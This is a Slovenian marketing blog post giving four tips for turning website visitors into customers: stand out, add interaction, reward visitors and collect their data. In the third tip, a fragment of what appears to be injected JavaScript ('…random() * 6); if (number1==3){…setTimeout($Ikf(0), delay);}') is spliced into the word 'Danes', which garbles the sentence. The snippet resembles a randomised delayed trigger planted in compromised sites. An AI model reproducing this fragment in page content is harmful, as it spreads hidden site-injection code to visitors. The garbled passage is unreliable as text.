fbpx

Kako pretvoriti obiskovalce v kupce?

Kako pretvoriti obiskovalce v kupce?

Če nisi “na spletu” ne obstajaš!

Danes velja rek, da če te ni na spletu, da ne obstajaš. Pa tudi če podjetje je dosegljivo na spletu, v čem je smisel tega, če še vedno nihče ne ve da sploh obstaja? Oglaševalske aktivnosti so torej ključne za uspeh podjetja, kajne?

Marketing je ključ do uspeha

Mnogo podjetij zato veliko časa in denarja nameni aktivnostim, katerih cilj je, da pripeljejo čim večje število zainteresiranih ljudi na spletno stran podjetja. Ampak oglaševalske kampanje, odnosi z javnostjo, optimizacija za spletne brskalnike, direktno oglaševanje, promocije, družbena omrežja, spletni oglasi in sama spletna stran, lahko povsem izčrpajo poslovne račune podjetja, pa podjetje vseeno ne bo poslovalo dosti bolje. Kaj je torej ključ do uspeha? Odgovor bi bil dober marketing v povezavi z pravilno zasnovano in oblikovano spletno stranjo!

Kako pretvoriti obiskovalce v kupce?

Predstavljamo vam 4 nasvete, kaj storiti, da čim večje število obiskovalcev, pretvorite v tisto, kar šteje, v kupce.

Bodite drugačni. Spletna stan, strani za zajem podatkov itd. naj bodo toliko unikatni, da ostanejo obiskovalcu v spominu, tudi takrat, ko je stran že zapustil. Najslabše kar lahko storite je namreč to, da zapravite ogromno časa in denarja za to, da nekoga pripeljete na vašo spletno stran, potem pa nanj ne napravite vtisa in ne poskrbite, da vas ne pozabi. Stremite torej k »wow« efektu.

Poskrbite za interakcijo. Načinov je veliko. Najemite dobrega grafičnega obiskovalca in vzpodbujajte njegovo kreativnost. Bodite drzni. Poslužujte se inovativnih barvnih kombinacij, slik ali celo animacij. Poizkusite se poigrati z najnovejšimi spletnimi pripomočki. Poskrbite, da vse aktivnosti, ki jih izvajate sledijo večjemu cilju in niso same sebi namen. Poskrbite, da imajo obiskovali na strani kaj početi. Ponudite jim, da prelistajo vaš virtualni katalog, da preberejo vaš blog in podobno. Kreativne video vsebine so prav tako lahko odličen način, da pretvorite obiskovalce v kupce.

Nagrajujte. Dandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andanes je skoraj vsepovsod velika konkurenca, zato je zelo pomembno, da ste drugačni. Poizkusite torej z raznoraznimi nagradami za vse obiskovalce, kot nekakšna zahvala za obisk in čas, ki so ga namenili vam. Nagrada je lahko kakšen posrečen video posnetek, šala, itd. Če ste trgovina, lahko ponudite posebne spletne kupone za popuste, ki jih ni mogoče dobiti nikjer drugje kot na vaši spletni strani. Izredno pomembno je torej, da poskrbite, da se obiskovalci počutijo kot del “ekskluzivnega” kluba, da se počutijo cenjene, itd.

Zajemajte podatke. Za konec samo še to. Pazite, da ne boste pozabili na forme za zajem podatkov. Škoda je namreč, da ves vaš trud, čas in denar, ki je bi potreben za to, da ste pripeljali obiskovalce na stran, da ste jih »zabavali« in nagradili, ne izkoristite v celoti in pridobite čim več njihovih podatkov. Pričnete lahko z formo za zajem email naslovov, ostale podatke pa poizkušate pridobiti kasneje v prodajnem ciklu (ne zahtevajte preveč prehitro).

V spletnem prodajnem ciklu je torej zelo pomembno, da opravite delo v celoti, da niste polovičarski. Pripravite si plan in mu nato tudi sledite. Poizkušajte vedno nove stvari in obdržite tisto, kar deluje in opustite tisto kar ne. Sledite tem nasvetom in pretvorite obiskovalce v kupce!

0 Komentarjev

Odgovori

Vaš e-naslov ne bo objavljen. * označuje zahtevana polja

*